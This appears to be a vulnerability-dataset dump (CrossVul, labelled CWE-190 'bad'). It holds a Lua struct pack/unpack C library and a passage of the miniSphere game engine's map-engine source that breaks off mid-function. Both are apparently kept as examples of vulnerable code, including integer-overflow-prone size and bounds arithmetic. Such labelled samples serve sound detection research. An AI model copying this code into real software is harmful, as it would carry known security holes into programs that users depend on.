** i/In - signed/unsigned integer with size 'n' (default is size of int)
** cn - sequence of 'n' chars (from/to a string); when packing, n==0 means
the whole string; when unpacking, n==0 means use the previous
read number as the string length
** s - zero-terminated string
** f - float
** d - double
** ' ' - ignored
*/
#include <assert.h>
#include <ctype.h>
#include <limits.h>
#include <stddef.h>
#include <string.h>
#include "lua.h"
#include "lauxlib.h"
#if (LUA_VERSION_NUM >= 502)
#define luaL_register(L,n,f) luaL_newlib(L,f)
#endif
/* basic integer type */
#if !defined(STRUCT_INT)
#define STRUCT_INT long
#endif
typedef STRUCT_INT Inttype;
/* corresponding unsigned version */
typedef unsigned STRUCT_INT Uinttype;
/* maximum size (in bytes) for integral types */
#define MAXINTSIZE 32
/* is 'x' a power of 2? */
#define isp2(x) ((x) > 0 && ((x) & ((x) - 1)) == 0)
/* dummy structure to get alignment requirements */
struct cD {
char c;
double d;
};
#define PADDING (sizeof(struct cD) - sizeof(double))
#define MAXALIGN (PADDING > sizeof(int) ? PADDING : sizeof(int))
/* endian options */
#define BIG 0
#define LITTLE 1
static union {
int dummy;
char endian;
} const native = {1};
typedef struct Header {
int endian;
int align;
} Header;
static int getnum (const char **fmt, int df) {
if (!isdigit(**fmt)) /* no number? */
return df; /* return default value */
else {
int a = 0;
do {
a = a*10 + *((*fmt)++) - '0';
} while (isdigit(**fmt));
return a;
}
}
#define defaultoptions(h) ((h)->endian = native.endian, (h)->align = 1)
static size_t optsize (lua_State *L, char opt, const char **fmt) {
switch (opt) {
case 'B': case 'b': return sizeof(char);
case 'H': case 'h': return sizeof(short);
case 'L': case 'l': return sizeof(long);
case 'T': return sizeof(size_t);
case 'f': return sizeof(float);
case 'd': return sizeof(double);
case 'x': return 1;
case 'c': return getnum(fmt, 1);
case 'i': case 'I': {
int sz = getnum(fmt, sizeof(int));
if (sz > MAXINTSIZE)
luaL_error(L, "integral size %d is larger than limit of %d",
sz, MAXINTSIZE);
return sz;
}
default: return 0; /* other cases do not need alignment */
}
}
/*
** return number of bytes needed to align an element of size 'size'
** at current position 'len'
*/
static int gettoalign (size_t len, Header *h, int opt, size_t size) {
if (size == 0 || opt == 'c') return 0;
if (size > (size_t)h->align)
size = h->align; /* respect max. alignment */
return (size - (len & (size - 1))) & (size - 1);
}
/*
** options to control endianess and alignment
*/
static void controloptions (lua_State *L, int opt, const char **fmt,
Header *h) {
switch (opt) {
case ' ': return; /* ignore white spaces */
case '>': h->endian = BIG; return;
case '<': h->endian = LITTLE; return;
case '!': {
int a = getnum(fmt, MAXALIGN);
if (!isp2(a))
luaL_error(L, "alignment %d is not a power of 2", a);
h->align = a;
return;
}
default: {
const char *msg = lua_pushfstring(L, "invalid format option '%c'", opt);
luaL_argerror(L, 1, msg);
}
}
}
static void putinteger (lua_State *L, luaL_Buffer *b, int arg, int endian,
int size) {
lua_Number n = luaL_checknumber(L, arg);
Uinttype value;
char buff[MAXINTSIZE];
if (n < 0)
value = (Uinttype)(Inttype)n;
else
value = (Uinttype)n;
if (endian == LITTLE) {
int i;
for (i = 0; i < size; i++) {
buff[i] = (value & 0xff);
value >>= 8;
}
}
else {
int i;
for (i = size - 1; i >= 0; i--) {
buff[i] = (value & 0xff);
value >>= 8;
}
}
luaL_addlstring(b, buff, size);
}
static void correctbytes (char *b, int size, int endian) {
if (endian != native.endian) {
int i = 0;
while (i < --size) {
char temp = b[i];
b[i++] = b[size];
b[size] = temp;
}
}
}
static int b_pack (lua_State *L) {
luaL_Buffer b;
const char *fmt = luaL_checkstring(L, 1);
Header h;
int arg = 2;
size_t totalsize = 0;
defaultoptions(&h);
lua_pushnil(L); /* mark to separate arguments from string buffer */
luaL_buffinit(L, &b);
while (*fmt != '\0') {
int opt = *fmt++;
size_t size = optsize(L, opt, &fmt);
int toalign = gettoalign(totalsize, &h, opt, size);
totalsize += toalign;
while (toalign-- > 0) luaL_addchar(&b, '\0');
switch (opt) {
case 'b': case 'B': case 'h': case 'H':
case 'l': case 'L': case 'T': case 'i': case 'I': { /* integer types */
putinteger(L, &b, arg++, h.endian, size);
break;
}
case 'x': {
luaL_addchar(&b, '\0');
break;
}
case 'f': {
float f = (float)luaL_checknumber(L, arg++);
correctbytes((char *)&f, size, h.endian);
luaL_addlstring(&b, (char *)&f, size);
break;
}
case 'd': {
double d = luaL_checknumber(L, arg++);
correctbytes((char *)&d, size, h.endian);
luaL_addlstring(&b, (char *)&d, size);
break;
}
case 'c': case 's': {
size_t l;
const char *s = luaL_checklstring(L, arg++, &l);
if (size == 0) size = l;
luaL_argcheck(L, l >= (size_t)size, arg, "string too short");
luaL_addlstring(&b, s, size);
if (opt == 's') {
luaL_addchar(&b, '\0'); /* add zero at the end */
size++;
}
break;
}
default: controloptions(L, opt, &fmt, &h);
}
totalsize += size;
}
luaL_pushresult(&b);
return 1;
}
static lua_Number getinteger (const char *buff, int endian,
int issigned, int size) {
Uinttype l = 0;
int i;
if (endian == BIG) {
for (i = 0; i < size; i++) {
l <<= 8;
l |= (Uinttype)(unsigned char)buff[i];
}
}
else {
for (i = size - 1; i >= 0; i--) {
l <<= 8;
l |= (Uinttype)(unsigned char)buff[i];
}
}
if (!issigned)
return (lua_Number)l;
else { /* signed format */
Uinttype mask = (Uinttype)(~((Uinttype)0)) << (size*8 - 1);
if (l & mask) /* negative value? */
l |= mask; /* signal extension */
return (lua_Number)(Inttype)l;
}
}
static int b_unpack (lua_State *L) {
Header h;
const char *fmt = luaL_checkstring(L, 1);
size_t ld;
const char *data = luaL_checklstring(L, 2, &ld);
size_t pos = luaL_optinteger(L, 3, 1) - 1;
int n = 0; /* number of results */
defaultoptions(&h);
while (*fmt) {
int opt = *fmt++;
size_t size = optsize(L, opt, &fmt);
pos += gettoalign(pos, &h, opt, size);
luaL_argcheck(L, pos+size <= ld, 2, "data string too short");
/* stack space for item + next position */
luaL_checkstack(L, 2, "too many results");
switch (opt) {
case 'b': case 'B': case 'h': case 'H':
case 'l': case 'L': case 'T': case 'i': case 'I': { /* integer types */
int issigned = islower(opt);
lua_Number res = getinteger(data+pos, h.endian, issigned, size);
lua_pushnumber(L, res); n++;
break;
}
case 'x': {
break;
}
case 'f': {
float f;
memcpy(&f, data+pos, size);
correctbytes((char *)&f, sizeof(f), h.endian);
lua_pushnumber(L, f); n++;
break;
}
case 'd': {
double d;
memcpy(&d, data+pos, size);
correctbytes((char *)&d, sizeof(d), h.endian);
lua_pushnumber(L, d); n++;
break;
}
case 'c': {
if (size == 0) {
if (n == 0 || !lua_isnumber(L, -1))
luaL_error(L, "format 'c0' needs a previous size");
size = lua_tonumber(L, -1);
lua_pop(L, 1); n--;
luaL_argcheck(L, size <= ld && pos <= ld - size,
2, "data string too short");
}
lua_pushlstring(L, data+pos, size); n++;
break;
}
case 's': {
const char *e = (const char *)memchr(data+pos, '\0', ld - pos);
if (e == NULL)
luaL_error(L, "unfinished string in data");
size = (e - (data+pos)) + 1;
lua_pushlstring(L, data+pos, size - 1); n++;
break;
}
default: controloptions(L, opt, &fmt, &h);
}
pos += size;
}
lua_pushinteger(L, pos + 1); /* next position */
return n + 1;
}
static int b_size (lua_State *L) {
Header h;
const char *fmt = luaL_checkstring(L, 1);
size_t pos = 0;
defaultoptions(&h);
while (*fmt) {
int opt = *fmt++;
size_t size = optsize(L, opt, &fmt);
pos += gettoalign(pos, &h, opt, size);
if (opt == 's')
luaL_argerror(L, 1, "option 's' has no fixed size");
else if (opt == 'c' && size == 0)
luaL_argerror(L, 1, "option 'c0' has no fixed size");
if (!isalnum(opt))
controloptions(L, opt, &fmt, &h);
pos += size;
}
lua_pushinteger(L, pos);
return 1;
}
/* }====================================================== */
static const struct luaL_Reg thislib[] = {
{"pack", b_pack},
{"unpack", b_unpack},
{"size", b_size},
{NULL, NULL}
};
LUALIB_API int luaopen_struct (lua_State *L);
LUALIB_API int luaopen_struct (lua_State *L) {
luaL_register(L, "struct", thislib);
return 1;
}
/******************************************************************************
* Copyright (C) 2010-2018 Lua.org, PUC-Rio. All rights reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish,
* distribute, sublicense, and/or sell copies of the Software, and to
* permit persons to whom the Software is furnished to do so, subject to
* the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
* IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
* CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
* TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
******************************************************************************/
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_131_0 |
crossvul-cpp_data_bad_35_0 | /**
* miniSphere JavaScript game engine
* Copyright (c) 2015-2018, Fat Cerberus
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of miniSphere nor the names of its contributors may be
* used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
**/
#include "minisphere.h"
#include "map_engine.h"
#include "api.h"
#include "audio.h"
#include "color.h"
#include "dispatch.h"
#include "geometry.h"
#include "image.h"
#include "input.h"
#include "jsal.h"
#include "obstruction.h"
#include "script.h"
#include "spriteset.h"
#include "tileset.h"
#include "vanilla.h"
#include "vector.h"
static const person_t* s_acting_person;
static mixer_t* s_bgm_mixer = NULL;
static person_t* s_camera_person = NULL;
static int s_camera_x = 0;
static int s_camera_y = 0;
static color_t s_color_mask;
static const person_t* s_current_person = NULL;
static int s_current_trigger = -1;
static int s_current_zone = -1;
static script_t* s_def_map_scripts[MAP_SCRIPT_MAX];
static script_t* s_def_person_scripts[PERSON_SCRIPT_MAX];
static bool s_exiting = false;
static color_t s_fade_color_from;
static color_t s_fade_color_to;
static int s_fade_frames;
static int s_fade_progress;
static int s_frame_rate = 0;
static unsigned int s_frames = 0;
static bool s_is_map_running = false;
static lstring_t* s_last_bgm_file = NULL;
static struct map* s_map = NULL;
static sound_t* s_map_bgm_stream = NULL;
static char* s_map_filename = NULL;
static int s_max_deferreds = 0;
static int s_max_persons = 0;
static unsigned int s_next_person_id = 0;
static int s_num_deferreds = 0;
static int s_num_persons = 0;
static struct map_trigger* s_on_trigger = NULL;
static unsigned int s_queued_id = 0;
static vector_t* s_person_list = NULL;
static struct player* s_players;
static script_t* s_render_script = NULL;
static int s_talk_button = 0;
static int s_talk_distance = 8;
static script_t* s_update_script = NULL;
static struct deferred *s_deferreds = NULL;
static person_t* *s_persons = NULL;
struct deferred
{
script_t* script;
int frames_left;
};
struct map
{
int width, height;
bool is_repeating;
point3_t origin;
lstring_t* bgm_file;
script_t* scripts[MAP_SCRIPT_MAX];
tileset_t* tileset;
vector_t* triggers;
vector_t* zones;
int num_layers;
int num_persons;
struct map_layer *layers;
struct map_person *persons;
};
struct map_layer
{
lstring_t* name;
bool is_parallax;
bool is_reflective;
bool is_visible;
float autoscroll_x;
float autoscroll_y;
color_t color_mask;
int height;
obsmap_t* obsmap;
float parallax_x;
float parallax_y;
script_t* render_script;
struct map_tile* tilemap;
int width;
};
struct map_person
{
lstring_t* name;
lstring_t* spriteset;
int x, y, z;
lstring_t* create_script;
lstring_t* destroy_script;
lstring_t* command_script;
lstring_t* talk_script;
lstring_t* touch_script;
};
struct map_tile
{
int tile_index;
int frames_left;
};
struct map_trigger
{
script_t* script;
int x, y, z;
};
struct map_zone
{
bool is_active;
rect_t bounds;
int interval;
int steps_left;
int layer;
script_t* script;
};
struct person
{
unsigned int id;
char* name;
int anim_frames;
char* direction;
int follow_distance;
int frame;
bool ignore_all_persons;
bool ignore_all_tiles;
vector_t* ignore_list;
bool is_persistent;
bool is_visible;
int layer;
person_t* leader;
color_t mask;
int mv_x, mv_y;
int revert_delay;
int revert_frames;
double scale_x;
double scale_y;
script_t* scripts[PERSON_SCRIPT_MAX];
double speed_x, speed_y;
spriteset_t* sprite;
double theta;
double x, y;
int x_offset, y_offset;
int max_commands;
int max_history;
int num_commands;
int num_ignores;
struct command *commands;
char* *ignores;
struct step *steps;
};
struct step
{
double x, y;
};
struct command
{
int type;
bool is_immediate;
script_t* script;
};
struct player
{
bool is_talk_allowed;
person_t* person;
int talk_key;
};
#pragma pack(push, 1)
struct rmp_header
{
char signature[4];
int16_t version;
uint8_t type;
int8_t num_layers;
uint8_t reserved_1;
int16_t num_entities;
int16_t start_x;
int16_t start_y;
int8_t start_layer;
int8_t start_direction;
int16_t num_strings;
int16_t num_zones;
uint8_t repeat_map;
uint8_t reserved[234];
};
struct rmp_entity_header
{
uint16_t x;
uint16_t y;
uint16_t z;
uint16_t type;
uint8_t reserved[8];
};
struct rmp_layer_header
{
int16_t width;
int16_t height;
uint16_t flags;
float parallax_x;
float parallax_y;
float scrolling_x;
float scrolling_y;
int32_t num_segments;
uint8_t is_reflective;
uint8_t reserved[3];
};
struct rmp_zone_header
{
uint16_t x1;
uint16_t y1;
uint16_t x2;
uint16_t y2;
uint16_t layer;
uint16_t interval;
uint8_t reserved[4];
};
#pragma pack(pop)
static bool change_map (const char* filename, bool preserve_persons);
static void command_person (person_t* person, int command);
static int compare_persons (const void* a, const void* b);
static void detach_person (const person_t* person);
static bool does_person_exist (const person_t* person);
static void draw_persons (int layer, bool is_flipped, int cam_x, int cam_y);
static bool enlarge_step_history (person_t* person, int new_size);
static void free_map (struct map* map);
static void free_person (person_t* person);
static struct map_trigger* get_trigger_at (int x, int y, int layer, int* out_index);
static struct map_zone* get_zone_at (int x, int y, int layer, int which, int* out_index);
static struct map* load_map (const char* path);
static void map_screen_to_layer (int layer, int camera_x, int camera_y, int* inout_x, int* inout_y);
static void map_screen_to_map (int camera_x, int camera_y, int* inout_x, int* inout_y);
static void process_map_input (void);
static void record_step (person_t* person);
static void reset_persons (bool keep_existing);
static void set_person_name (person_t* person, const char* name);
static void sort_persons (void);
static void update_map_engine (bool is_main_loop);
static void update_person (person_t* person, bool* out_has_moved);
void
map_engine_init(void)
{
int i;
console_log(1, "initializing map engine subsystem");
audio_init();
s_bgm_mixer = mixer_new(44100, 16, 2);
memset(s_def_map_scripts, 0, MAP_SCRIPT_MAX * sizeof(int));
memset(s_def_person_scripts, 0, PERSON_SCRIPT_MAX * sizeof(int));
s_map = NULL; s_map_filename = NULL;
s_camera_person = NULL;
s_players = calloc(PLAYER_MAX, sizeof(struct player));
for (i = 0; i < PLAYER_MAX; ++i)
s_players[i].is_talk_allowed = true;
s_current_trigger = -1;
s_current_zone = -1;
s_render_script = NULL;
s_update_script = NULL;
s_num_deferreds = s_max_deferreds = 0;
s_deferreds = NULL;
s_talk_button = 0;
s_is_map_running = false;
s_color_mask = mk_color(0, 0, 0, 0);
s_on_trigger = NULL;
s_num_persons = s_max_persons = 0;
s_persons = NULL;
s_talk_distance = 8;
s_acting_person = NULL;
s_current_person = NULL;
}
void
map_engine_uninit(void)
{
int i;
console_log(1, "shutting down map engine subsystem");
vector_free(s_person_list);
for (i = 0; i < s_num_deferreds; ++i)
script_unref(s_deferreds[i].script);
free(s_deferreds);
for (i = 0; i < MAP_SCRIPT_MAX; ++i)
script_unref(s_def_map_scripts[i]);
script_unref(s_update_script);
script_unref(s_render_script);
free_map(s_map);
free(s_players);
for (i = 0; i < s_num_persons; ++i)
free_person(s_persons[i]);
for (i = 0; i < PERSON_SCRIPT_MAX; ++i)
script_unref(s_def_person_scripts[i]);
free(s_persons);
mixer_unref(s_bgm_mixer);
audio_uninit();
}
void
map_engine_on_map_event(map_op_t op, script_t* script)
{
script_t* old_script;
old_script = s_def_map_scripts[op];
s_def_map_scripts[op] = script_ref(script);
script_unref(old_script);
}
void
map_engine_on_person_event(person_op_t op, script_t* script)
{
script_t* old_script;
old_script = s_def_person_scripts[op];
s_def_person_scripts[op] = script_ref(script);
script_unref(old_script);
}
void
map_engine_on_render(script_t* script)
{
script_unref(s_render_script);
s_render_script = script_ref(script);
}
void
map_engine_on_update(script_t* script)
{
script_unref(s_update_script);
s_update_script = script_ref(script);
}
const person_t*
map_engine_acting_person(void)
{
return s_acting_person;
}
const person_t*
map_engine_active_person(void)
{
return s_current_person;
}
int
map_engine_active_trigger(void)
{
return s_current_trigger;
}
int
map_engine_active_zone(void)
{
return s_current_zone;
}
vector_t*
map_engine_persons(void)
{
int i;
if (s_person_list == NULL)
s_person_list = vector_new(sizeof(person_t*));
vector_clear(s_person_list);
for (i = 0; i < s_num_persons; ++i)
vector_push(s_person_list, &s_persons[i]);
return s_person_list;
}
bool
map_engine_running(void)
{
return s_is_map_running;
}
int
map_engine_get_framerate(void)
{
return s_frame_rate;
}
person_t*
map_engine_get_player(player_id_t player_id)
{
return s_players[player_id].person;
}
person_t*
map_engine_get_subject(void)
{
return s_camera_person;
}
int
map_engine_get_talk_button(void)
{
return s_talk_button;
}
int
map_engine_get_talk_distance(void)
{
return s_talk_distance;
}
int
map_engine_get_talk_key(player_id_t player_id)
{
return s_players[player_id].talk_key;
}
void
map_engine_set_framerate(int framerate)
{
s_frame_rate = framerate;
}
void
map_engine_set_player(player_id_t player_id, person_t* person)
{
int i;
// detach person from any other players
for (i = 0; i < PLAYER_MAX; ++i) {
if (s_players[i].person == person)
s_players[i].person = NULL;
}
s_players[player_id].person = person;
}
void
map_engine_set_subject(person_t* person)
{
s_camera_person = person;
}
void
map_engine_set_talk_button(int button_id)
{
s_talk_button = button_id;
}
void
map_engine_set_talk_distance(int distance)
{
s_talk_distance = distance;
}
void
map_engine_set_talk_key(player_id_t player_id, int key)
{
s_players[player_id].talk_key = key;
}
bool
map_engine_change_map(const char* filename)
{
return change_map(filename, false);
}
void
map_engine_defer(script_t* script, int num_frames)
{
struct deferred* deferred;
if (++s_num_deferreds > s_max_deferreds) {
s_max_deferreds = s_num_deferreds * 2;
s_deferreds = realloc(s_deferreds, s_max_deferreds * sizeof(struct deferred));
}
deferred = &s_deferreds[s_num_deferreds - 1];
deferred->script = script;
deferred->frames_left = num_frames;
}
void
map_engine_draw_map(void)
{
bool is_repeating;
int cell_x;
int cell_y;
int first_cell_x;
int first_cell_y;
struct map_layer* layer;
int layer_height;
int layer_width;
size2_t resolution;
int tile_height;
int tile_index;
int tile_width;
int off_x;
int off_y;
int x, y, z;
if (screen_skipping_frame(g_screen))
return;
resolution = screen_size(g_screen);
tileset_get_size(s_map->tileset, &tile_width, &tile_height);
// render map layers from bottom to top (+Z = up)
for (z = 0; z < s_map->num_layers; ++z) {
layer = &s_map->layers[z];
is_repeating = s_map->is_repeating || layer->is_parallax;
layer_width = layer->width * tile_width;
layer_height = layer->height * tile_height;
off_x = 0;
off_y = 0;
map_screen_to_layer(z, s_camera_x, s_camera_y, &off_x, &off_y);
// render person reflections if layer is reflective
al_hold_bitmap_drawing(true);
if (layer->is_reflective) {
if (is_repeating) { // for small repeating maps, persons need to be repeated as well
for (y = 0; y < resolution.height / layer_height + 2; ++y) for (x = 0; x < resolution.width / layer_width + 2; ++x)
draw_persons(z, true, off_x - x * layer_width, off_y - y * layer_height);
}
else {
draw_persons(z, true, off_x, off_y);
}
}
// render tiles, but only if the layer is visible
if (layer->is_visible) {
first_cell_x = off_x / tile_width;
first_cell_y = off_y / tile_height;
for (y = 0; y < resolution.height / tile_height + 2; ++y) for (x = 0; x < resolution.width / tile_width + 2; ++x) {
cell_x = is_repeating ? (x + first_cell_x) % layer->width : x + first_cell_x;
cell_y = is_repeating ? (y + first_cell_y) % layer->height : y + first_cell_y;
if (cell_x < 0 || cell_x >= layer->width || cell_y < 0 || cell_y >= layer->height)
continue;
tile_index = layer->tilemap[cell_x + cell_y * layer->width].tile_index;
tileset_draw(s_map->tileset, layer->color_mask, x * tile_width - off_x % tile_width, y * tile_height - off_y % tile_height, tile_index);
}
}
// render persons
if (is_repeating) { // for small repeating maps, persons need to be repeated as well
for (y = 0; y < resolution.height / layer_height + 2; ++y) for (x = 0; x < resolution.width / layer_width + 2; ++x)
draw_persons(z, false, off_x - x * layer_width, off_y - y * layer_height);
}
else {
draw_persons(z, false, off_x, off_y);
}
al_hold_bitmap_drawing(false);
script_run(layer->render_script, false);
}
al_draw_filled_rectangle(0, 0, resolution.width, resolution.height, nativecolor(s_color_mask));
script_run(s_render_script, false);
}
void
map_engine_exit(void)
{
s_exiting = true;
}
void
map_engine_fade_to(color_t color_mask, int num_frames)
{
if (num_frames > 0) {
s_fade_color_to = color_mask;
s_fade_color_from = s_color_mask;
s_fade_frames = num_frames;
s_fade_progress = 0;
}
else {
s_color_mask = color_mask;
s_fade_color_to = s_fade_color_from = color_mask;
s_fade_progress = s_fade_frames = 0;
}
}
bool
map_engine_start(const char* filename, int framerate)
{
s_is_map_running = true;
s_exiting = false;
s_color_mask = mk_color(0, 0, 0, 0);
s_fade_color_to = s_fade_color_from = s_color_mask;
s_fade_progress = s_fade_frames = 0;
al_clear_to_color(al_map_rgba(0, 0, 0, 255));
s_frame_rate = framerate;
if (!change_map(filename, true))
goto on_error;
while (!s_exiting && jsal_vm_enabled()) {
sphere_heartbeat(true, 1);
// order of operations matches Sphere 1.x. not sure why, but Sphere 1.x
// checks for input AFTER an update for some reason...
update_map_engine(true);
process_map_input();
map_engine_draw_map();
// don't clear the backbuffer. the Sphere 1.x map engine has a bug where it doesn't
// clear the backbuffer between frames; as it turns out, a good deal of of v1 code relies
// on that behavior.
sphere_tick(1, false, s_frame_rate);
}
reset_persons(false);
s_is_map_running = false;
return true;
on_error:
s_is_map_running = false;
return false;
}
void
map_engine_update(void)
{
update_map_engine(false);
}
rect_t
map_bounds(void)
{
rect_t bounds;
int tile_w, tile_h;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
bounds.x1 = 0; bounds.y1 = 0;
bounds.x2 = s_map->width * tile_w;
bounds.y2 = s_map->height * tile_h;
return bounds;
}
int
map_layer_by_name(const char* name)
{
int i;
for (i = 0; i < s_map->num_layers; ++i) {
if (strcmp(name, lstr_cstr(s_map->layers[0].name)) == 0)
return i;
}
return -1;
}
int
map_num_layers(void)
{
return s_map->num_layers;
}
int
map_num_persons(void)
{
return s_num_persons;
}
int
map_num_triggers(void)
{
return vector_len(s_map->triggers);
}
int
map_num_zones(void)
{
return vector_len(s_map->zones);
}
point3_t
map_origin(void)
{
return s_map != NULL ? s_map->origin
: mk_point3(0, 0, 0);
}
const char*
map_pathname(void)
{
return s_map ? s_map_filename : NULL;
}
person_t*
map_person_by_name(const char* name)
{
int i;
for (i = 0; i < s_num_persons; ++i) {
if (strcmp(name, s_persons[i]->name) == 0)
return s_persons[i];
}
return NULL;
}
int
map_tile_at(int x, int y, int layer)
{
int layer_h;
int layer_w;
layer_w = s_map->layers[layer].width;
layer_h = s_map->layers[layer].height;
if (s_map->is_repeating || s_map->layers[layer].is_parallax) {
x = (x % layer_w + layer_w) % layer_w;
y = (y % layer_h + layer_h) % layer_h;
}
if (x < 0 || y < 0 || x >= layer_w || y >= layer_h)
return -1;
return layer_get_tile(layer, x, y);
}
tileset_t*
map_tileset(void)
{
return s_map->tileset;
}
int
map_trigger_at(int x, int y, int layer)
{
rect_t bounds;
int tile_w, tile_h;
struct map_trigger* trigger;
iter_t iter;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
iter = vector_enum(s_map->triggers);
while ((trigger = iter_next(&iter))) {
if (trigger->z != layer && false) // layer ignored for compatibility
continue;
bounds.x1 = trigger->x - tile_w / 2;
bounds.y1 = trigger->y - tile_h / 2;
bounds.x2 = bounds.x1 + tile_w;
bounds.y2 = bounds.y1 + tile_h;
if (is_point_in_rect(x, y, bounds))
return iter.index;
}
return -1;
}
point2_t
map_xy_from_screen(point2_t screen_xy)
{
int x;
int y;
x = screen_xy.x;
y = screen_xy.y;
map_screen_to_map(s_camera_x, s_camera_y, &x, &y);
return mk_point2(x, y);
}
int
map_zone_at(int x, int y, int layer, int which)
{
struct map_zone* zone;
iter_t iter;
iter = vector_enum(s_map->zones);
while ((zone = iter_next(&iter))) {
if (zone->layer != layer && false) // layer ignored for compatibility
continue;
if (is_point_in_rect(x, y, zone->bounds) && --which < 0)
return iter.index;
}
return -1;
}
point2_t
map_get_camera_xy(void)
{
return mk_point2(s_camera_x, s_camera_y);
}
void
map_set_camera_xy(point2_t where)
{
s_camera_x = where.x;
s_camera_y = where.y;
}
void
map_activate(map_op_t op, bool use_default)
{
if (use_default)
script_run(s_def_map_scripts[op], false);
script_run(s_map->scripts[op], false);
}
bool
map_add_trigger(int x, int y, int layer, script_t* script)
{
struct map_trigger trigger;
console_log(2, "creating trigger #%d on map '%s'", vector_len(s_map->triggers), s_map_filename);
console_log(3, " location: '%s' @ (%d,%d)", lstr_cstr(s_map->layers[layer].name), x, y);
trigger.x = x; trigger.y = y;
trigger.z = layer;
trigger.script = script_ref(script);
if (!vector_push(s_map->triggers, &trigger))
return false;
return true;
}
bool
map_add_zone(rect_t bounds, int layer, script_t* script, int steps)
{
struct map_zone zone;
console_log(2, "creating %u-step zone #%d on map '%s'", steps, vector_len(s_map->zones), s_map_filename);
console_log(3, " bounds: (%d,%d)-(%d,%d)", bounds.x1, bounds.y1, bounds.x2, bounds.y2);
memset(&zone, 0, sizeof(struct map_zone));
zone.bounds = bounds;
zone.layer = layer;
zone.script = script_ref(script);
zone.interval = steps;
zone.steps_left = 0;
if (!vector_push(s_map->zones, &zone))
return false;
return true;
}
void
map_call_default(map_op_t op)
{
script_run(s_def_map_scripts[op], false);
}
void
map_normalize_xy(double* inout_x, double* inout_y, int layer)
{
int tile_w, tile_h;
int layer_w, layer_h;
if (s_map == NULL)
return; // can't normalize if no map loaded
if (!s_map->is_repeating && !s_map->layers[layer].is_parallax)
return;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
layer_w = s_map->layers[layer].width * tile_w;
layer_h = s_map->layers[layer].height * tile_h;
if (inout_x)
*inout_x = fmod(fmod(*inout_x, layer_w) + layer_w, layer_w);
if (inout_y)
*inout_y = fmod(fmod(*inout_y, layer_h) + layer_h, layer_h);
}
void
map_remove_trigger(int trigger_index)
{
vector_remove(s_map->triggers, trigger_index);
}
void
map_remove_zone(int zone_index)
{
vector_remove(s_map->zones, zone_index);
}
void
layer_on_render(int layer, script_t* script)
{
script_unref(s_map->layers[layer].render_script);
s_map->layers[layer].render_script = script_ref(script);
}
const char*
layer_name(int layer)
{
return lstr_cstr(s_map->layers[layer].name);
}
const obsmap_t*
layer_obsmap(int layer)
{
return s_map->layers[layer].obsmap;
}
size2_t
layer_size(int layer)
{
struct map_layer* layer_data;
layer_data = &s_map->layers[layer];
return mk_size2(layer_data->width, layer_data->height);
}
color_t
layer_get_color_mask(int layer)
{
return s_map->layers[layer].color_mask;
}
bool
layer_get_reflective(int layer)
{
return s_map->layers[layer].is_reflective;
}
int
layer_get_tile(int layer, int x, int y)
{
struct map_tile* tile;
int width;
width = s_map->layers[layer].width;
tile = &s_map->layers[layer].tilemap[x + y * width];
return tile->tile_index;
}
bool
layer_get_visible(int layer)
{
return s_map->layers[layer].is_visible;
}
void
layer_set_color_mask(int layer, color_t color)
{
s_map->layers[layer].color_mask = color;
}
void
layer_set_reflective(int layer, bool reflective)
{
s_map->layers[layer].is_reflective = reflective;
}
void
layer_set_tile(int layer, int x, int y, int tile_index)
{
struct map_tile* tile;
int width;
width = s_map->layers[layer].width;
tile = &s_map->layers[layer].tilemap[x + y * width];
tile->tile_index = tile_index;
tile->frames_left = tileset_get_delay(s_map->tileset, tile_index);
}
void
layer_set_visible(int layer, bool visible)
{
s_map->layers[layer].is_visible = visible;
}
void
layer_replace_tiles(int layer, int old_index, int new_index)
{
int layer_h;
int layer_w;
struct map_tile* tile;
int i_x, i_y;
layer_w = s_map->layers[layer].width;
layer_h = s_map->layers[layer].height;
for (i_x = 0; i_x < layer_w; ++i_x) for (i_y = 0; i_y < layer_h; ++i_y) {
tile = &s_map->layers[layer].tilemap[i_x + i_y * layer_w];
if (tile->tile_index == old_index)
tile->tile_index = new_index;
}
}
bool
layer_resize(int layer, int x_size, int y_size)
{
int old_height;
int old_width;
struct map_tile* tile;
int tile_width;
int tile_height;
